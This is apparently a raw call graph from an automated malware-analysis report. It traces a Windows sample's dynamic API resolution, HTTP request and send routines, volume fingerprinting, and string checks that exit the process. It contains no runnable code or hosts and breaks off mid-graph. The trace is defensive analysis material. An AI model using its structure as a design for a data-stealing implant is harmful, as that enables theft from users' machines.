14154->14155 14156 d3366 14155->14156 14157 d45c0 2 API calls 14156->14157 14158 d337f 14157->14158 14159 d45c0 2 API calls 14158->14159 14160 d3398 14159->14160 14161 d45c0 2 API calls 14160->14161 14162 d33b1 14161->14162 14163 d45c0 2 API calls 14162->14163 14164 d33ca 14163->14164 14165 d45c0 2 API calls 14164->14165 14166 d33e3 14165->14166 14167 d45c0 2 API calls 14166->14167 14168 d33fc 14167->14168 14169 d45c0 2 API calls 14168->14169 14170 d3415 14169->14170 14171 d45c0 2 API calls 14170->14171 14172 d342e 14171->14172 14173 d45c0 2 API calls 14172->14173 14174 d3447 14173->14174 14175 d45c0 2 API calls 14174->14175 14176 d3460 14175->14176 14177 d45c0 2 API calls 14176->14177 14178 d3479 14177->14178 14179 d45c0 2 API calls 14178->14179 14180 d3492 14179->14180 14181 d45c0 2 API calls 14180->14181 14182 d34ab 14181->14182 14183 d45c0 2 API calls 14182->14183 14184 d34c4 14183->14184 14185 d45c0 2 API calls 14184->14185 14186 d34dd 14185->14186 14187 d45c0 2 API calls 14186->14187 14188 d34f6 14187->14188 14189 d45c0 2 API calls 14188->14189 14190 d350f 14189->14190 14191 d45c0 2 API calls 14190->14191 14192 d3528 14191->14192 14193 d45c0 2 API calls 14192->14193 14194 d3541 14193->14194 14195 d45c0 2 API calls 14194->14195 14196 d355a 14195->14196 14197 d45c0 2 API calls 14196->14197 14198 d3573 14197->14198 14199 d45c0 2 API calls 14198->14199 14200 d358c 14199->14200 14201 d45c0 2 API calls 14200->14201 14202 d35a5 14201->14202 14203 d45c0 2 API calls 14202->14203 14204 d35be 14203->14204 14205 d45c0 2 API calls 14204->14205 14206 d35d7 14205->14206 14207 d45c0 2 API calls 14206->14207 14208 d35f0 14207->14208 14209 d45c0 2 API calls 14208->14209 14210 d3609 14209->14210 14211 d45c0 2 API calls 14210->14211 14212 d3622 14211->14212 14213 d45c0 2 API calls 14212->14213 14214 d363b 14213->14214 14215 d45c0 2 API calls 14214->14215 14216 d3654 14215->14216 14217 d45c0 2 API calls 14216->14217 14218 d366d 14217->14218 14219 d45c0 2 API calls 14218->14219 14220 d3686 14219->14220 14221 d45c0 2 API calls 14220->14221 14222 d369f 14221->14222 14223 d45c0 2 API calls 14222->14223 14224 d36b8 14223->14224 14225 d45c0 2 API calls 14224->14225 14226 d36d1 14225->14226 14227 d45c0 2 API calls 14226->14227 14228 d36ea 14227->14228 14229 d45c0 2 API calls 14228->14229 14230 d3703 14229->14230 14231 d45c0 2 API calls 14230->14231 14232 d371c 14231->14232 14233 d45c0 2 API calls 14232->14233 14234 d3735 14233->14234 14235 d45c0 2 API calls 14234->14235 14236 d374e 14235->14236 14237 d45c0 2 API calls 14236->14237 14238 d3767 14237->14238 14239 d45c0 2 API calls 14238->14239 14240 d3780 14239->14240 14241 d45c0 2 API calls 14240->14241 14242 d3799 14241->14242 14243 d45c0 2 API calls 14242->14243 14244 d37b2 14243->14244 14245 d45c0 2 API calls 14244->14245 14246 d37cb 14245->14246 14247 d45c0 2 API calls 14246->14247 14248 d37e4 14247->14248 14249 d45c0 2 API calls 14248->14249 14250 d37fd 14249->14250 14251 d45c0 2 API calls 14250->14251 14252 d3816 14251->14252 14253 d45c0 2 API calls 14252->14253 14254 d382f 14253->14254 14255 d45c0 2 API calls 14254->14255 14256 d3848 14255->14256 14257 d45c0 2 API calls 14256->14257 14258 d3861 14257->14258 14259 d45c0 2 API calls 14258->14259 14260 d387a 14259->14260 14261 d45c0 2 API calls 14260->14261 14262 d3893 14261->14262 14263 d45c0 2 API calls 14262->14263 14264 d38ac 14263->14264 14265 d45c0 2 API calls 14264->14265 14266 d38c5 14265->14266 14267 d45c0 2 API calls 14266->14267 14268 d38de 14267->14268 14269 d45c0 2 API calls 14268->14269 14270 d38f7 14269->14270 14271 d45c0 2 API calls 14270->14271 14272 d3910 14271->14272 14273 d45c0 2 API calls 14272->14273 14274 d3929 14273->14274 14275 d45c0 2 API calls 14274->14275 14276 d3942 14275->14276 14277 d45c0 2 API calls 14276->14277 14278 d395b 14277->14278 14279 d45c0 2 API calls 14278->14279 14280 d3974 14279->14280 14281 d45c0 2 API calls 14280->14281 14282 d398d 14281->14282 14283 d45c0 2 API calls 14282->14283 14284 d39a6 14283->14284 14285 d45c0 2 API calls 14284->14285 14286 d39bf 14285->14286 14287 d45c0 2 API calls 14286->14287 14288 d39d8 14287->14288 14289 d45c0 2 API calls 14288->14289 14290 d39f1 14289->14290 14291 d45c0 2 API calls 14290->14291 14292 d3a0a 14291->14292 14293 d45c0 2 API calls 14292->14293 14294 d3a23 14293->14294 14295 d45c0 2 API calls 14294->14295 14296 d3a3c 14295->14296 14297 d45c0 2 API calls 14296->14297 14298 d3a55 14297->14298 14299 d45c0 2 API calls 14298->14299 14300 d3a6e 14299->14300 14301 d45c0 2 API calls 14300->14301 14302 d3a87 14301->14302 14303 d45c0 2 API calls 14302->14303 14304 d3aa0 14303->14304 14305 d45c0 2 API calls 14304->14305 14306 d3ab9 14305->14306 14307 d45c0 2 API calls 14306->14307 14308 d3ad2 14307->14308 14309 d45c0 2 API calls 14308->14309 14310 d3aeb 14309->14310 14311 d45c0 2 API calls 14310->14311 14312 d3b04 14311->14312 14313 d45c0 2 API calls 14312->14313 14314 d3b1d 14313->14314 14315 d45c0 2 API calls 14314->14315 14316 d3b36 14315->14316 14317 d45c0 2 API calls 14316->14317 14318 d3b4f 14317->14318 14319 d45c0 2 API calls 14318->14319 14320 d3b68 14319->14320 14321 d45c0 2 API calls 14320->14321 14322 d3b81 14321->14322 14323 d45c0 2 API calls 14322->14323 14324 d3b9a 14323->14324 14325 d45c0 2 API calls 14324->14325 14326 d3bb3 14325->14326 14327 d45c0 2 API calls 14326->14327 14328 d3bcc 14327->14328 14329 d45c0 2 API calls 14328->14329 14330 d3be5 14329->14330 14331 d45c0 2 API calls 14330->14331 14332 d3bfe 14331->14332 14333 d45c0 2 API calls 14332->14333 14334 d3c17 14333->14334 14335 d45c0 2 API calls 14334->14335 14336 d3c30 14335->14336 14337 d45c0 2 API calls 14336->14337 14338 d3c49 14337->14338 14339 d45c0 2 API calls 14338->14339 14340 d3c62 14339->14340 14341 d45c0 2 API calls 14340->14341 14342 d3c7b 14341->14342 14343 d45c0 2 API calls 14342->14343 14344 d3c94 14343->14344 14345 d45c0 2 API calls 14344->14345 14346 d3cad 14345->14346 14347 d45c0 2 API calls 14346->14347 14348 d3cc6 14347->14348 14349 d45c0 2 API calls 14348->14349 14350 d3cdf 14349->14350 14351 d45c0 2 API calls 14350->14351 14352 d3cf8 14351->14352 14353 d45c0 2 API calls 14352->14353 14354 d3d11 14353->14354 14355 d45c0 2 API calls 14354->14355 14356 d3d2a 14355->14356 14357 d45c0 2 API calls 14356->14357 14358 d3d43 14357->14358 14359 d45c0 2 API calls 14358->14359 14360 d3d5c 14359->14360 14361 d45c0 2 API calls 14360->14361 14362 d3d75 14361->14362 14363 d45c0 2 API calls 14362->14363 14364 d3d8e 14363->14364 14365 d45c0 2 API calls 14364->14365 14366 d3da7 14365->14366 14367 d45c0 2 API calls 14366->14367 14368 d3dc0 14367->14368 14369 d45c0 2 API calls 14368->14369 14370 d3dd9 14369->14370 14371 d45c0 2 API calls 14370->14371 14372 d3df2 14371->14372 14373 d45c0 2 API calls 14372->14373 14374 d3e0b 14373->14374 14375 d45c0 2 API calls 14374->14375 14376 d3e24 14375->14376 14377 d45c0 2 API calls 14376->14377 14378 d3e3d 14377->14378 14379 d45c0 2 API calls 14378->14379 14380 d3e56 14379->14380 14381 d45c0 2 API calls 14380->14381 14382 d3e6f 14381->14382 14383 d45c0 2 API calls 14382->14383 14384 d3e88 14383->14384 14385 d45c0 2 API calls 14384->14385 14386 d3ea1 14385->14386 14387 d45c0 2 API calls 14386->14387 14388 d3eba 14387->14388 14389 d45c0 2 API calls 14388->14389 14390 d3ed3 14389->14390 14391 d45c0 2 API calls 14390->14391 14392 d3eec 14391->14392 14393 d45c0 2 API calls 14392->14393 14394 d3f05 14393->14394 14395 d45c0 2 API calls 14394->14395 14396 d3f1e 14395->14396 14397 d45c0 2 API calls 14396->14397 14398 d3f37 14397->14398 14399 d45c0 2 API calls 14398->14399 14400 d3f50 14399->14400 14401 d45c0 2 API calls 14400->14401 14402 d3f69 14401->14402 14403 d45c0 2 API calls 14402->14403 14404 d3f82 14403->14404 14405 d45c0 2 API calls 14404->14405 14406 d3f9b 14405->14406 14407 d45c0 2 API calls 14406->14407 14408 d3fb4 14407->14408 14409 d45c0 2 API calls 14408->14409 14410 d3fcd 14409->14410 14411 d45c0 2 API calls 14410->14411 14412 d3fe6 14411->14412 14413 d45c0 2 API calls 14412->14413 14414 d3fff 14413->14414 14415 d45c0 2 API calls 14414->14415 14416 d4018 14415->14416 14417 d45c0 2 API calls 14416->14417 14418 d4031 14417->14418 14419 d45c0 2 API calls 14418->14419 14420 d404a 14419->14420 14421 d45c0 2 API calls 14420->14421 14422 d4063 14421->14422 14423 d45c0 2 API calls 14422->14423 14424 d407c 14423->14424 14425 d45c0 2 API calls 14424->14425 14426 d4095 14425->14426 14427 d45c0 2 API calls 14426->14427 14428 d40ae 14427->14428 14429 d45c0 2 API calls 14428->14429 14430 d40c7 14429->14430 14431 d45c0 2 API calls 14430->14431 14432 d40e0 14431->14432 14433 d45c0 2 API calls 14432->14433 14434 d40f9 14433->14434 14435 d45c0 2 API calls 14434->14435 14436 d4112 14435->14436 14437 d45c0 2 API calls 14436->14437 14438 d412b 14437->14438 14439 d45c0 2 API calls 14438->14439 14440 d4144 14439->14440 14441 d45c0 2 API calls 14440->14441 14442 d415d 14441->14442 14443 d45c0 2 API calls 14442->14443 14444 d4176 14443->14444 14445 d45c0 2 API calls 14444->14445 14446 d418f 14445->14446 14447 d45c0 2 API calls 14446->14447 14448 d41a8 14447->14448 14449 d45c0 2 API calls 14448->14449 14450 d41c1 14449->14450 14451 d45c0 2 API calls 14450->14451 14452 d41da 14451->14452 14453 d45c0 2 API calls 14452->14453 14454 d41f3 14453->14454 14455 d45c0 2 API calls 14454->14455 14456 d420c 14455->14456 14457 d45c0 2 API calls 14456->14457 14458 d4225 14457->14458 14459 d45c0 2 API calls 14458->14459 14460 d423e 14459->14460 14461 d45c0 2 API calls 14460->14461 14462 d4257 14461->14462 14463 d45c0 2 API calls 14462->14463 14464 d4270 14463->14464 14465 d45c0 2 API calls 14464->14465 14466 d4289 14465->14466 14467 d45c0 2 API calls 14466->14467 14468 d42a2 14467->14468 14469 d45c0 2 API calls 14468->14469 14470 d42bb 14469->14470 14471 d45c0 2 API calls 14470->14471 14472 d42d4 14471->14472 14473 d45c0 2 API calls 14472->14473 14474 d42ed 14473->14474 14475 d45c0 2 API calls 14474->14475 14476 d4306 14475->14476 14477 d45c0 2 API calls 14476->14477 14478 d431f 14477->14478 14479 d45c0 2 API calls 14478->14479 14480 d4338 14479->14480 14481 d45c0 2 API calls 14480->14481 14482 d4351 14481->14482 14483 d45c0 2 API calls 14482->14483 14484 d436a 14483->14484 14485 d45c0 2 API calls 14484->14485 14486 d4383 14485->14486 14487 d45c0 2 API calls 14486->14487 14488 d439c 14487->14488 14489 d45c0 2 API calls 14488->14489 14490 d43b5 14489->14490 14491 d45c0 2 API calls 14490->14491 14492 d43ce 14491->14492 14493 d45c0 2 API calls 14492->14493 14494 d43e7 14493->14494 14495 d45c0 2 API calls 14494->14495 14496 d4400 14495->14496 14497 d45c0 2 API calls 14496->14497 14498 d4419 14497->14498 14499 d45c0 2 API calls 14498->14499 14500 d4432 14499->14500 14501 d45c0 2 API calls 14500->14501 14502 d444b 14501->14502 14503 d45c0 2 API calls 14502->14503 14504 d4464 14503->14504 14505 d45c0 2 API calls 14504->14505 14506 d447d 14505->14506 14507 d45c0 2 API calls 14506->14507 14508 d4496 14507->14508 14509 d45c0 2 API calls 14508->14509 14510 d44af 14509->14510 14511 d45c0 2 API calls 14510->14511 14512 d44c8 14511->14512 14513 d45c0 2 API calls 14512->14513 14514 d44e1 14513->14514 14515 d45c0 2 API calls 14514->14515 14516 d44fa 14515->14516 14517 d45c0 2 API calls 14516->14517 14518 d4513 14517->14518 14519 d45c0 2 API calls 14518->14519 14520 d452c 14519->14520 14521 d45c0 2 API calls 14520->14521 14522 d4545 14521->14522 14523 d45c0 2 API calls 14522->14523 14524 d455e 14523->14524 14525 d45c0 2 API calls 14524->14525 14526 d4577 14525->14526 14527 d45c0 2 API calls 14526->14527 14528 d4590 14527->14528 14529 d45c0 2 API calls 14528->14529 14530 d45a9 14529->14530 14531 e9c10 14530->14531 14532 ea036 8 API calls 14531->14532 14533 e9c20 43 API calls 14531->14533 14534 ea0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14532->14534 14535 ea146 14532->14535 14533->14532 14534->14535 14536 ea216 14535->14536 14537 ea153 8 API calls 14535->14537 14538 ea21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14536->14538 14539 ea298 14536->14539 14537->14536 14538->14539 14540 ea337 14539->14540 14541 ea2a5 6 API calls 14539->14541 14542 ea41f 14540->14542 14543 ea344 9 API calls 14540->14543 14541->14540 14544 ea428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14542->14544 14545 ea4a2 14542->14545 14543->14542 14544->14545 14546 ea4dc 14545->14546 14547 ea4ab GetProcAddress GetProcAddress 14545->14547 14548 ea515 14546->14548 14549 ea4e5 GetProcAddress GetProcAddress 14546->14549 14547->14546 14550 ea612 14548->14550 14551 ea522 10 API calls 14548->14551 14549->14548 14552 ea67d 14550->14552 14553 ea61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14550->14553 14551->14550 14554 ea69e 14552->14554 14555 ea686 GetProcAddress 14552->14555 14553->14552 14556 e5ca3 14554->14556 14557 ea6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14554->14557 14555->14554 14558 d1590 14556->14558 14557->14556 15677 d1670 14558->15677 14561 ea7a0 lstrcpy 14562 d15b5 14561->14562 14563 ea7a0 lstrcpy 14562->14563 14564 d15c7 14563->14564 14565 ea7a0 lstrcpy 14564->14565 14566 d15d9 14565->14566 14567 ea7a0 lstrcpy 14566->14567 14568 d1663 14567->14568 14569 e5510 14568->14569 14570 e5521 14569->14570 14571 ea820 2 API calls 14570->14571 14572 e552e 14571->14572 14573 ea820 2 API calls 14572->14573 14574 e553b 14573->14574 14575 ea820 2 API calls 14574->14575 14576 e5548 14575->14576 14577 ea740 lstrcpy 14576->14577 14578 e5555 14577->14578 14579 ea740 lstrcpy 14578->14579 14580 e5562 14579->14580 14581 ea740 lstrcpy 14580->14581 14582 e556f 14581->14582 14583 ea740 lstrcpy 14582->14583 14622 e557c 14583->14622 14584 e52c0 25 API calls 14584->14622 14585 e51f0 20 API calls 14585->14622 14586 e5643 StrCmpCA 14586->14622 14587 e56a0 StrCmpCA 14589 e57dc 14587->14589 14587->14622 14588 ea7a0 lstrcpy 14588->14622 14590 ea8a0 lstrcpy 14589->14590 14591 e57e8 14590->14591 14592 ea820 2 API calls 14591->14592 14595 e57f6 14592->14595 14593 ea740 lstrcpy 14593->14622 14594 ea820 lstrlen lstrcpy 14594->14622 14597 ea820 2 API calls 14595->14597 14596 e5856 StrCmpCA 14598 e5991 14596->14598 14596->14622 14600 e5805 14597->14600 14599 ea8a0 lstrcpy 14598->14599 14601 e599d 14599->14601 14602 d1670 lstrcpy 14600->14602 14603 ea820 2 API calls 14601->14603 14619 e5811 14602->14619 14604 e59ab 14603->14604 14606 ea820 2 API calls 14604->14606 14605 e5a0b StrCmpCA 14607 e5a28 14605->14607 14608 e5a16 Sleep 14605->14608 14610 e59ba 14606->14610 14609 ea8a0 lstrcpy 14607->14609 14608->14622 14611 e5a34 14609->14611 14612 d1670 lstrcpy 14610->14612 14613 ea820 2 API calls 14611->14613 14612->14619 14614 e5a43 14613->14614 14615 ea820 2 API calls 14614->14615 14616 e5a52 14615->14616 14618 d1670 lstrcpy 14616->14618 14617 e578a StrCmpCA 14617->14622 14618->14619 14619->13676 14620 d1590 lstrcpy 14620->14622 14621 e593f StrCmpCA 14621->14622 14622->14584 14622->14585 14622->14586 14622->14587 14622->14588 14622->14593 14622->14594 14622->14596 14622->14605 14622->14617 14622->14620 14622->14621 14623 ea8a0 lstrcpy 14622->14623 14623->14622 14625 e754c 14624->14625 14626 e7553 GetVolumeInformationA 14624->14626 14625->14626 14627 e7591 14626->14627 14628 e75fc GetProcessHeap RtlAllocateHeap 14627->14628 14629 e7628 wsprintfA 14628->14629 14630 e7619 14628->14630 14632 ea740 lstrcpy 14629->14632 14631 ea740 lstrcpy 14630->14631 14633 e5da7 14631->14633 14632->14633 14633->13697 14635 ea7a0 lstrcpy 14634->14635 14636 d4899 14635->14636 15686 d47b0 14636->15686 14638 d48a5 14639 ea740 lstrcpy 14638->14639 14640 d48d7 14639->14640 14641 ea740 lstrcpy 14640->14641 14642 d48e4 14641->14642 14643 ea740 lstrcpy 14642->14643 14644 d48f1 14643->14644 14645 ea740 lstrcpy 14644->14645 14646 d48fe 14645->14646 14647 ea740 lstrcpy 14646->14647 14648 d490b InternetOpenA StrCmpCA 14647->14648 14649 d4944 14648->14649 14650 d4ecb InternetCloseHandle 14649->14650 15692 e8b60 14649->15692 14652 d4ee8 14650->14652 15707 d9ac0 CryptStringToBinaryA 14652->15707 14653 d4963 15700 ea920 14653->15700 14656 d4976 14658 ea8a0 lstrcpy 14656->14658 14663 d497f 14658->14663 14659 ea820 2 API calls 14660 d4f05 14659->14660 14661 ea9b0 4 API calls 14660->14661 14664 d4f1b 14661->14664 14662 d4f27 ctype 14666 ea7a0 lstrcpy 14662->14666 14667 ea9b0 4 API calls 14663->14667 14665 ea8a0 lstrcpy 14664->14665 14665->14662 14679 d4f57 14666->14679 14668 d49a9 14667->14668 14669 ea8a0 lstrcpy 14668->14669 14670 d49b2 14669->14670 14671 ea9b0 4 API calls 14670->14671 14672 d49d1 14671->14672 14673 ea8a0 lstrcpy 14672->14673 14674 d49da 14673->14674 14675 ea920 3 API calls 14674->14675 14676 d49f8 14675->14676 14677 ea8a0 lstrcpy 14676->14677 14678 d4a01 14677->14678 14680 ea9b0 4 API calls 14678->14680 14679->13700 14681 d4a20 14680->14681 14682 ea8a0 lstrcpy 14681->14682 14683 d4a29 14682->14683 14684 ea9b0 4 API calls 14683->14684 14685 d4a48 14684->14685 14686 ea8a0 lstrcpy 14685->14686 14687 d4a51 14686->14687 14688 ea9b0 4 API calls 14687->14688 14689 d4a7d 14688->14689 14690 ea920 3 API calls 14689->14690 14691 d4a84 14690->14691 14692 ea8a0 lstrcpy 14691->14692 14693 d4a8d 14692->14693 14694 d4aa3 InternetConnectA 14693->14694 14694->14650 14695 d4ad3 HttpOpenRequestA 14694->14695 14697 d4ebe InternetCloseHandle 14695->14697 14698 d4b28 14695->14698 14697->14650 14699 ea9b0 4 API calls 14698->14699 14700 d4b3c 14699->14700 14701 ea8a0 lstrcpy 14700->14701 14702 d4b45 14701->14702 14703 ea920 3 API calls 14702->14703 14704 d4b63 14703->14704 14705 ea8a0 lstrcpy 14704->14705 14706 d4b6c 14705->14706 14707 ea9b0 4 API calls 14706->14707 14708 d4b8b 14707->14708 14709 ea8a0 lstrcpy 14708->14709 14710 d4b94 14709->14710 14711 ea9b0 4 API calls 14710->14711 14712 d4bb5 14711->14712 14713 ea8a0 lstrcpy 14712->14713 14714 d4bbe 14713->14714 14715 ea9b0 4 API calls 14714->14715 14716 d4bde 14715->14716 14717 ea8a0 lstrcpy 14716->14717 14718 d4be7 14717->14718 14719 ea9b0 4 API calls 14718->14719 14720 d4c06 14719->14720 14721 ea8a0 lstrcpy 14720->14721 14722 d4c0f 14721->14722 14723 ea920 3 API calls 14722->14723 14724 d4c2d 14723->14724 14725 ea8a0 lstrcpy 14724->14725 14726 d4c36 14725->14726 14727 ea9b0 4 API calls 14726->14727 14728 d4c55 14727->14728 14729 ea8a0 lstrcpy 14728->14729 14730 d4c5e 14729->14730 14731 ea9b0 4 API calls 14730->14731 14732 d4c7d 14731->14732 14733 ea8a0 lstrcpy 14732->14733 14734 d4c86 14733->14734 14735 ea920 3 API calls 14734->14735 14736 d4ca4 14735->14736 14737 ea8a0 lstrcpy 14736->14737 14738 d4cad 14737->14738 14739 ea9b0 4 API calls 14738->14739 14740 d4ccc 14739->14740 14741 ea8a0 lstrcpy 14740->14741 14742 d4cd5 14741->14742 14743 ea9b0 4 API calls 14742->14743 14744 d4cf6 14743->14744 14745 ea8a0 lstrcpy 14744->14745 14746 d4cff 14745->14746 14747 ea9b0 4 API calls 14746->14747 14748 d4d1f 14747->14748 14749 ea8a0 lstrcpy 14748->14749 14750 d4d28 14749->14750 14751 ea9b0 4 API calls 14750->14751 14752 d4d47 14751->14752 14753 ea8a0 lstrcpy 14752->14753 14754 d4d50 14753->14754 14755 ea920 3 API calls 14754->14755 14756 d4d6e 14755->14756 14757 ea8a0 lstrcpy 14756->14757 14758 d4d77 14757->14758 14759 ea740 lstrcpy 14758->14759 14760 d4d92 14759->14760 14761 ea920 3 API calls 14760->14761 14762 d4db3 14761->14762 14763 ea920 3 API calls 14762->14763 14764 d4dba 14763->14764 14765 ea8a0 lstrcpy 14764->14765 14766 d4dc6 14765->14766 14767 d4de7 lstrlen 14766->14767 14768 d4dfa 14767->14768 14769 d4e03 lstrlen 14768->14769 15706 eaad0 14769->15706 14771 d4e13 HttpSendRequestA 14772 d4e32 InternetReadFile 14771->14772 14773 d4e67 InternetCloseHandle 14772->14773 14778 d4e5e 14772->14778 14776 ea800 14773->14776 14775 ea9b0 4 API calls 14775->14778 14776->14697 14777 ea8a0 lstrcpy 14777->14778 14778->14772 14778->14773 14778->14775 14778->14777 15713 eaad0 14779->15713 14781 e17c4 StrCmpCA 14782 e17cf ExitProcess 14781->14782 14786 e17d7 14781->14786 14783 e19c2 14783->13702 14784 e18cf StrCmpCA 14784->14786 14785 e18ad StrCmpCA 14785->14786 14786->14783 14786->14784 14786->14785 14787 e187f StrCmpCA 14786->14787 14788 e185d StrCmpCA 14786->14788 14789 e1932 StrCmpCA 14786->14789 14790 e1913 StrCmpCA 14786->14790 14791 e1970 StrCmpCA 14786->14791 14792 e18f1 StrCmpCA 14786->14792 14793 e1951 StrCmpCA 14786->14793 14794 ea820 lstrlen lstrcpy 14786->14794 14787->14786 14788->14786 14789->14786 14790->14786 14791->14786 14792->14786 14793->14786 14794->14786 14796 ea7a0 lstrcpy 14795->14796 14797 d5979 14796->14797 14798 d47b0 2 API calls 14797->14798 14799 d5985 14798->14799 14800 ea740 lstrcpy 14799->14800 14801 d59ba 14800->14801 14802 ea740 lstrcpy 14801->14802 14803 d59c7 14802->14803 14804 ea740 lstrcpy 14803->14804 14805 d59d4 14804->14805 14806 ea740 lstrcpy 14805->14806 14807 d59e1 14806->14807 14808 ea740 lstrcpy 14807->14808 14809 d59ee InternetOpenA StrCmpCA 14808->14809 14810 d5a1d 14809->14810 14811 d5fc3 InternetCloseHandle 14810->14811 14812 e8b60 3 API calls 14810->14812 14813 d5fe0 14811->14813 14814 d5a3c 14812->14814 14816 d9ac0 4 API calls 14813->14816 14815 ea920 3 API calls 14814->14815 14817 d5a4f 14815->14817 14818 d5fe6 14816->14818 14819 ea8a0 lstrcpy 14817->14819 14820 ea820 2 API calls 14818->14820 14827 d601f ctype 14818->14827 14826 d5a58 14819->14826 14821 d5ffd 14820->14821 14822 ea9b0 4 API calls 14821->14822 14823 d6013 14822->14823 14824 ea8a0 lstrcpy 14823->14824 14824->14827 14825 ea7a0 lstrcpy 14836 d604f 14825->14836 14828 ea9b0 4 API calls 14826->14828 14827->14825 14829 d5a82 14828->14829 14830 ea8a0 lstrcpy 14829->14830 14831 d5a8b 14830->14831 14832 ea9b0 4 API calls 14831->14832 14833 d5aaa 14832->14833 14834 ea8a0 lstrcpy 14833->14834 14835 d5ab3 14834->14835 14837 ea920 3 API calls 14835->14837 14836->13708 14838 d5ad1 14837->14838 14839 ea8a0 lstrcpy 14838->14839 14840 d5ada 14839->14840 14841 ea9b0 4 API calls 14840->14841 14842 d5af9 14841->14842 14843 ea8a0 lstrcpy 14842->14843 14844 d5b02 14843->14844 14845 ea9b0 4 API calls 14844->14845 14846 d5b21 14845->14846 14847 ea8a0 lstrcpy 14846->14847 14848 d5b2a 14847->14848 14849 ea9b0 4 API calls 14848->14849 14850 d5b56 14849->14850 14851 ea920 3 API calls 14850->14851 14852 d5b5d 14851->14852 14853 ea8a0 lstrcpy 14852->14853 14854 d5b66 14853->14854 14855 d5b7c InternetConnectA 14854->14855 14855->14811 14856 d5bac HttpOpenRequestA 14855->14856 14858 d5c0b 14856->14858 14859 d5fb6 InternetCloseHandle 14856->14859 14860 ea9b0 4 API calls 14858->14860 14859->14811 14861 d5c1f 14860->14861 14862 ea8a0 lstrcpy 14861->14862 14863 d5c28 14862->14863 14864 ea920 3 API calls 14863->14864 14865 d5c46 14864->14865 14866 ea8a0 lstrcpy 14865->14866 14867 d5c4f 14866->14867 14868 ea9b0 4 API calls 14867->14868 14869 d5c6e 14868->14869 14870 ea8a0 lstrcpy 14869->14870 14871 d5c77 14870->14871 14872 ea9b0 4 API calls 14871->14872 14873 d5c98 14872->14873 14874 ea8a0 lstrcpy 14873->14874 14875 d5ca1 14874->14875 14876 ea9b0 4 API calls 14875->14876 14877 d5cc1 14876->14877 14878 ea8a0 lstrcpy 14877->14878 14879 d5cca 14878->14879 14880 ea9b0 4 API calls 14879->14880 14881 d5ce9 14880->14881 14882 ea8a0 lstrcpy 14881->14882 14883 d5cf2 14882->14883 14884 ea920 3 API calls 14883->14884 14885 d5d10 14884->14885 14886 ea8a0 lstrcpy 14885->14886 14887 d5d19 14886->14887 14888 ea9b0 4 API calls 14887->14888 14889 d5d38 14888->14889 14890 ea8a0 lstrcpy 14889->14890 14891 d5d41 14890->14891 14892 ea9b0 4 API calls 14891->14892 14893 d5d60 14892->14893 14894 ea8a0 lstrcpy 14893->14894 14895 d5d69 14894->14895 14896 ea920 3 API calls 14895->14896 14897 d5d87 14896->14897 14898 ea8a0 lstrcpy 14897->14898 14899 d5d90 14898->14899 14900 ea9b0 4 API calls 14899->14900 14901 d5daf 14900->14901 14902 ea8a0 lstrcpy 14901->14902 14903 d5db8 14902->14903 14904 ea9b0 4 API calls 14903->14904 14905 d5dd9 14904->14905 14906 ea8a0 lstrcpy 14905->14906 14907 d5de2 14906->14907 14908 ea9b0 4 API calls 14907->14908 14909 d5e02 14908->14909 14910 ea8a0 lstrcpy 14909->14910 14911 d5e0b 14910->14911 14912 ea9b0 4 API calls 14911->14912 14913 d5e2a 14912->14913 14914 ea8a0 lstrcpy 14913->14914 14915 d5e33 14914->14915 14916 ea920 3 API calls 14915->14916 14917 d5e54 14916->14917 14918 ea8a0 lstrcpy 14917->14918 14919 d5e5d 14918->14919 14920 d5e70 lstrlen 14919->14920 15714 eaad0 14920->15714 14922 d5e81 lstrlen GetProcessHeap RtlAllocateHeap 15715 eaad0 14922->15715 14924 d5eae lstrlen 14925 d5ebe 14924->14925 14926 d5ed7 lstrlen 14925->14926 14927 d5ee7 14926->14927 14928 d5ef0 lstrlen 14927->14928 14929 d5f04 14928->14929 14930 d5f1a lstrlen 14929->14930 15716 eaad0 14930->15716 14932 d5f2a HttpSendRequestA 14933 d5f35 InternetReadFile 14932->14933 14934 d5f6a InternetCloseHandle 14933->14934 14938 d5f61 14933->14938 14934->14859 14936 ea9b0 4 API calls 14936->14938 14937 ea8a0 lstrcpy 14937->14938 14938->14933 14938->14934 14938->14936 14938->14937 14940 e1077 14939->14940 14941 e1151 14940->14941 14942 ea820 lstrlen lstrcpy 14940->14942 14941->13710 14942->14940 14948 e0db7 14943->14948 14944 e0f17 14944->13718 14945 e0e27 StrCmpCA 14945->14948 14946 e0e67 StrCmpCA 14946->14948 14947 e0ea4 StrCmpCA 14947->14948 14948->14944 14948->14945 14948->14946 14948->14947 14949 ea820 lstrlen lstrcpy 14948->14949 14949->14948 14953 e0f67 14950->14953 14951 e1044 14951->13726 14952 e0fb2 StrCmpCA 14952->14953 14953->14951 14953->14952 14954 ea820 lstrlen lstrcpy 14953->14954 14954->14953 14956 ea740 lstrcpy 14955->14956 14957 e1a26 14956->14957 14958 ea9b0 4 API calls 14957->14958 14959 e1a37 14958->14959 14960 ea8a0 lstrcpy 14959->14960 14961 e1a40 14960->14961 14962 ea9b0 4 API calls 14961->14962 14963 e1a5b 14962->14963 14964 ea8a0 lstrcpy 14963->14964 14965 e1a64 14964->14965 14966 ea9b0 4 API calls 14965->14966 14967 e1a7d 14966->14967 14968 ea8a0 lstrcpy 14967->14968 14969 e1a86 14968->14969 14970 ea9b0 4 API calls 14969->14970 14971 e1aa1 14970->14971 14972 ea8a0 lstrcpy 14971->14972 14973 e1aaa 14972->14973 14974 ea9b0 4 API calls 14973->14974 14975 e1ac3 14974->14975 14976 ea8a0 lstrcpy 14975->14976 14977 e1acc 14976->14977 14978 ea9b0 4 API calls 14977->14978 14979 e1ae7 14978->14979 14980 ea8a0 lstrcpy 14979->14980 14981 e1af0 14980->14981 14982 ea9b0 4 API calls 14981->14982 14983 e1b09 14982->14983 14984 ea8a0 lstrcpy 14983->14984 14985 e1b12 14984->14985 14986 ea9b0 4 API calls 14985->14986 14987 e1b2d 14986->14987 14988 ea8a0 lstrcpy 14987->14988 14989 e1b36 14988->14989 14990 ea9b0 4 API calls 14989->14990 14991 e1b4f 14990->14991 14992 ea8a0 lstrcpy 14991->14992 14993 e1b58 14992->14993 14994 ea9b0 4 API calls 14993->14994 14995 e1b76 14994->14995 14996 ea8a0 lstrcpy 14995->14996 14997 e1b7f 14996->14997 14998 e7500 6 API calls 14997->14998 14999 